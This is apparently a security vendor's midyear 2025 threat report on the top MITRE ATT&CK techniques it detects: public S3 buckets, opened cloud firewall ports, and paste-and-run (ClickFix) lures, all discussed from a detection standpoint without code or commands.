Midyear techniques
Two new cloud techniques made their way into the top 10 for the first half of 2025: Data from Cloud Storage and Disable or Modify Cloud Firewall
Over the last few years, we’ve expanded our detection and response offerings from endpoints to identities, the cloud, and beyond. It’s taken time, but customer adoption of our non-endpoint products—and ongoing expansion of detection coverage for these products—has reached the threshold necessary to impact our technique rating over the last 18 months or so.
First emerged T1078.004: Cloud Accounts and T1114.003: Email Forwarding Rule. Then came T1564.008: Email Hiding Rules. Now we’ve got two more new cloud related techniques in our top 10: T1530: Data from Cloud Storage and T1562.007: Disable or Modify Cloud Firewall.
Top 10 MITRE ATT&CK® techniques from the first half of 2025
Since we covered the remaining top techniques extensively just a few months ago in the 2025 Threat Detection Report (or in past reports, as the case may be), we’re going to focus this section on the two new techniques, plus T1204.004: Malicious Copy and Paste.
New cloud techniques
As we hinted earlier—and like much of the suspicious identity behavior we’re detecting—our detections for T1530 and T1562.007 straddle the line between overt threats and risks. Let’s start by explaining exactly what we’re detecting for each of these techniques, and then we’ll explore the implicit challenge underlying our detection strategies for these two techniques.
T1530: Data from Cloud Storage
The overwhelming majority of detections associated with this technique involve someone successfully enabling public access for an AWS S3 storage bucket. Exposing S3 buckets to the open internet is a potential misconfiguration issue that’s enabled countless breaches over the last decade. However, it’s also a legitimate functionality of AWS and there are numerous reasons why an engineer or an admin might want to make an S3 bucket public. When you’re running detection at scale across departments or environments that you’re not intimately familiar with, it’s incredibly difficult to ascribe intent to this kind of behavior.
T1562.007: Disable or Modify Cloud Firewall
We are detecting this technique across multiple cloud platforms, but the behavior we’re detecting is fundamentally similar. It involves opening ingress ports (e.g., RDP, SSH, VNC, etc.) to allow connections from external IP addresses or otherwise removing firewall policies or rules in Amazon Web Services (AWS), Azure, or Google Cloud Platform (GCP). Again, allowing connection from any external IP address into your cloud infrastructure is a potentially dangerous misconfiguration (or overtly malicious act) that could lead to serious consequences. However, it’s also a legitimate function of your cloud firewall with legitimate use cases. Intent is once again hard to ascribe from afar, and we are again detecting a risk as opposed to a definite threat.
The challenge
In both cases here, we’re largely detecting behavior that is risky. It’s hard to programmatically confirm whether the behavior is malicious, suspicious, unwanted, or entirely benign. In fact, for both techniques, there’s effectively four things that could be happening:
Again, as was the case with suspicious VPN examples in the Trends section, organizations are forced to choose between detecting high-risk activity along with the benign, or accepting that high level of risk exposure by ignoring this activity altogether. Given the precedence of breaches that have historically resulted from lenient access policies for cloud resources, these are risks that we believe organizations should detect and investigate as much as they are able.
That is why we approach detection from two standpoints:
- First, an atomic approach that detects risky behavior that could be malicious or legitimate admin activity
- Second, a holistic narrative approach that builds several atomic detections together into a threat timeline that describes when activity shifts into a true threat
This tiered approach allows us to make fine-tuned detectors while also enabling enough contextual information for organizations to accurately determine if the behavior is malicious or benign.
While you could monitor logs from your cloud provider and wait to detect until you see evidence of exfiltration or other malicious activity, the damage may already be done at that point.
T1204.004: Malicious Copy and Paste
A relatively new entrant into MITRE ATT&CK, this technique encompasses the paste-and-run (aka ClickFix, fakeCAPTCHA) activity that’s dominated the initial access landscape for the last year. T1204.004 evades our top 10 primarily because the detectors we leverage to catch this behavior are broadly scoped and mapped to different techniques.
Paste and run certainly warrants discussion given its meteoric rise to prominence since we first started tracking it in August 2024. Adversaries leverage this technique to deliver stealers, RMM tools, backdoors, and more.
Paste and run comes in two primary flavors:
- The user has to “fix” their access to a document, website, or software installation/update by following the instructions in the paste-and-run lure.
- A CAPTCHA-style lure prompting the user to follow given instructions to prove they are a human, also to gain access to a document, website, or installation/update process.
Ultimately, the adversary is trying to dupe the user into verifying or fixing something by opening a terminal, run box, or PowerShell. This can be done via shortcuts that include the Windows button and R or X and by pasting (Ctrl + V) unknown scripts or commands.
The following is a non-exhaustive list of threats known to leverage paste and run for initial access: